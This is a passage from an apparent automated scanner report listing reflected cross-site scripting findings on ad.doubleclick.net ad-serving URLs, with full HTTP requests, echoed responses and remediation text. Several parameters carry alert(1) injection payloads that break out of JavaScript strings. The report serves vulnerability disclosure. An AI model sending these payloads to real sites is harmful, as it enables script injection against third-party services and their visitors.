1.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 955d3"-alert(1)-"79fca5d6b07 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221955d3"-alert(1)-"79fca5d6b07&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:30:29 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221955d3"-alert(1)-"79fca5d6b07&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/Rad
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83e6"-alert(1)-"517e13c6861 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579e83e6"-alert(1)-"517e13c6861&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:30:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579e83e6"-alert(1)-"517e13c6861&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7636"-alert(1)-"63cd2f45aaf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c7636"-alert(1)-"63cd2f45aaf&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5236
Date: Tue, 28 Jun 2011 02:30:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
%3B0%3B62126625%3B4307-300/250%3B42562264/42580051/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c7636"-alert(1)-"63cd2f45aaf&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f5662
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edf41"-alert(1)-"547d679179c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=edf41"-alert(1)-"547d679179c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4862
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:31:02 GMT
Expires: Tue, 28 Jun 2011 02:31:02 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
26625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=edf41"-alert(1)-"547d679179chttp://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;62126625;239242768;42719607&migRandom=4631798&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshackwi
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a14"-alert(1)-"5a45727816e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=43801233687707687070a14"-alert(1)-"5a45727816e&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:29:54 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=43801233687707687070a14"-alert(1)-"5a45727816e&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_S
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c057"-alert(1)-"6f219f1e3a4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=1006048c057"-alert(1)-"6f219f1e3a4&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5998
Date: Tue, 28 Jun 2011 02:33:08 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
se Sapphire DRTV 300x250NoVisaLogo.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=1006048c057"-alert(1)-"6f219f1e3a4&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.chasesapphire.com/%3FCELL%3D62CG");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "ffffff";
v
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf69"-alert(1)-"a746c5cd003 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971ccf69"-alert(1)-"a746c5cd003&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:32:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
mdn.net/3094545/Chase_Sapphire_10k No Fee_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971ccf69"-alert(1)-"a746c5cd003&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campai
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35fd"-alert(1)-"5de782ce6f7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530d35fd"-alert(1)-"5de782ce6f7&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:33:30 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530d35fd"-alert(1)-"5de782ce6f7&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campaign%3D5383603%26utm_content%3DZ10KP");
var fscUrl = url;
var
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926de"-alert(1)-"6a870769378 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=926de"-alert(1)-"6a870769378 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
